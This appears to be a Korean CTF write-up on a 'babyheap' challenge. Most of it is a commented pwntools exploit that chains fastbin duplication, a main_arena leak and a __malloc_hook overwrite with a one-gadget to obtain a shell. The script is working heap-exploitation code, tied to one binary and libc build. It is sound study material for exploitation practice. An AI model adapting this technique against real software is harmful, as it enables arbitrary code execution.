요즘 다시 대회 문제에 손을 하나씩 대고 있는데...
힙이 아직 넘사벽이어서
힙을 공부중입니다
껄껄
그냥 fastbin duplicate + unsorted bin에 관해 알면 익스가 가능합니다.
대충 봤는데 heap base를 릭 해서 뚜샤뚜샤 할 수도 있을 거 같고
mprotect를 heap 세그먼트에 써서 쉘코드 뚜샤뚜샤도 될거 같다 히히
친-절하게 주석까지 다 달아 놓음
#!/usr/bin/python
from pwn import *
p = process("./babyheap")  # local target; the commented-out remote() line below is the alternative transport
#p = remote("localhost",4000)
lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")  # NOTE(review): neither `lib` nor `elf` is referenced anywhere below; the libc offsets later in this script are hard-coded constants, not read from this object
elf = ELF("./babyheap")
def alloca(size):
    """Drive menu option 1 (allocate) and return the index the program reports.

    Sends the requested size, parses the integer printed after
    "Allocate Index ", then consumes the next "Command: " prompt so the
    caller is left at the top of the menu.
    """
    p.sendline("1")
    p.readuntil("Size: ")
    p.sendline(str(size))
    p.readuntil("Allocate Index ")
    index = int(p.readuntil("\n"))
    p.readuntil("Command: ")
    print("[+] Heap Allocated. %d" % index)
    return index
def fill(idx,size,data):
    """Drive menu option 2 (fill): write `data` into chunk `idx`.

    `size` is sent to the program as the byte count it should read; `data`
    is sent raw with `send` (no trailing newline). Always returns True once
    the next "Command: " prompt has been consumed.
    """
    p.sendline("2")
    for prompt, reply in (("Index: ", str(idx)), ("Size: ", str(size))):
        p.readuntil(prompt)
        p.sendline(reply)
    p.readuntil("Content: ")
    p.send(data)
    p.readuntil("Command: ")
    print("[+] Data Filled. %d" % idx)
    return True
def free(idx):
    """Drive menu option 3 (free) for chunk `idx`; always returns True."""
    # Each pair is (what we send, the prompt we wait for afterwards).
    for reply, expect in (("3", "Index: "), (str(idx), "Command: ")):
        p.sendline(reply)
        p.readuntil(expect)
    print("[*] Heap Freed. %d" % idx)
    return True
def dump(idx):
    """Drive menu option 4 (dump) and return the raw bytes printed for chunk `idx`.

    Output is read up to the next menu header ("1. Allocate"); that header
    and the newline immediately before it are stripped from the result.
    """
    menu_header = "1. Allocate"
    p.sendline("4")
    p.readuntil("Index: ")
    p.sendline(str(idx))
    p.readuntil("\n")
    raw = p.readuntil(menu_header)
    content = raw[:-(len(menu_header) + 1)]
    p.readuntil("Command: ")
    print("[*] Heap Dumped. %d" % idx)
    return content
############## EXPLOIT ##############
# What follows is a fixed, order-dependent interaction script against the four
# menu commands wrapped above (alloca/fill/free/dump).  The ''' STAGE n '''
# strings are bare string-literal statements used as section labels; they have
# no runtime effect.  Every numeric constant below (chunk sizes, size fields,
# libc offsets) is as given by the author and is tied to one specific binary
# and libc build.
raw_input("READY >>> ")  # blocks until Enter is pressed before anything is sent to the target
print "[!] EXPLOIT START"  # Python 2 print statement: this script does not run under Python 3
''' STAGE 1 '''
'''
- allocate 3 fastbins.
- allocate 2 smallbins.
'''
alloca(10) # idx : 0
alloca(10) # idx : 1
alloca(10) # idx : 2
alloca(300) # idx : 3
alloca(300) # idx : 4 presumably (fifth allocation; original comment said 3) -- alloca() prints the index the program actually reports
''' STAGE 2 '''
'''
- Change fd of idx:3 by overflowing idx:2
'''
payload = ''
payload += p64(0)*2 # padding
payload += p64(0) #
payload += p64(0x21) # change size for fastbin duplicate
fill(2,len(payload),payload)  # writes more bytes than the 10 requested for idx 2: relies on the fill command having no bounds check
''' STAGE 3 '''
'''
- Free idx:0,2 for create fastbin chunk ( fd )
'''
free(0)
free(2)
''' STAGE 4 '''
'''
- Change fastbin chunk ( idx:2's fd ) by filling idx:1 for duplication
'''
payload = ''
payload += p64(0)*2
payload += p64(0)
payload += p64(0x21)
payload += p8(0x60)  # only the low byte is overwritten; assumes the heap layout the author observed -- not verifiable from this page
fill(1,len(payload),payload)
''' STAGE 5 '''
'''
- Allocate 2 fastbins for duplication ( use-after-free? )
'''
alloca(10) # idx : 0
alloca(10) # idx : 2 <-- it points same as idx:3.
''' STAGE 6 '''
'''
- Change smallbin chunk by filling idx:1 for free smallbin
'''
payload =''
payload += p64(0)*2
payload += p64(0)
payload += p64(0x21)
payload += p64(0)*2
payload += p64(0)
payload += p64(0x141)
fill(1,len(payload),payload)
''' STAGE 7 '''
'''
- Free smallbin(idx:3) for leak main_arena ( unsorted bin )
'''
free(3)
''' STAGE 8 '''
'''
- Leak main_arena
'''
libc_main = 0
libc_main_arena = 0x3c4b20  # main_arena offset for the author's libc build (as given on the page)
tmp = dump(2)
leak = u64(tmp[:-2])  # assumes dump(2) returns the 8 leaked bytes plus 2 trailing bytes, since u64 expects exactly 8 -- confirm against the dump output format
libc_main = leak - libc_main_arena - 88  # the 88 is the author's adjustment from the leaked pointer to main_arena; taken as given
libc_1shot = libc_main + 0x4526a  # one-gadget offset for the same libc build (as given)
libc_mhook = libc_main + 0x3c4b10  # __malloc_hook offset for the same libc build (as given)
print("[!] LEAK : 0x%x"%(leak))
print("[+] LIBC MAIN : 0x%x"%(libc_main))
print("[+] ONE-SHOT : 0x%x"%(libc_1shot))
print("[+] __malloc_hook : 0x%x"%(libc_mhook))
alloca(300)
''' STAGE 9 '''
'''
- Setting fastbin_dup_into_stack for duplicate __malloc_hook
'''
alloca(100) # idx:5
alloca(100) # idx:6
alloca(100) # idx:7
free(5)
free(7) # fastbin chunk generated
''' STAGE 10 '''
'''
- fastbin_dup_into_stack: duplicate chunk
'''
payload = ''
payload += p64(0)*12
payload += p64(0)
payload += p64(0x71)
payload += p64(libc_mhook-35) # Setting fd  -- the 35 is the author's constant; it reappears below as 'a'*(35-16)
fill(6,len(payload),payload)
''' STAGE 10 '''  # label repeated from the previous section in the original
'''
- fastbin_dup_into_stack: allocate
'''
alloca(103) # idx:5
alloca(103) # idx:7
''' STAGE 11 '''
'''
- EXPLOIT!
'''
payload = ''
payload += 'a'*(35-16)
payload += p64(libc_1shot)
fill(7,len(payload),payload)
# The final Allocate is issued by hand rather than via alloca(), so nothing is
# read back from the target before the session is handed to the user.
p.sendline("1")
p.sendline("10") # shell
p.interactive()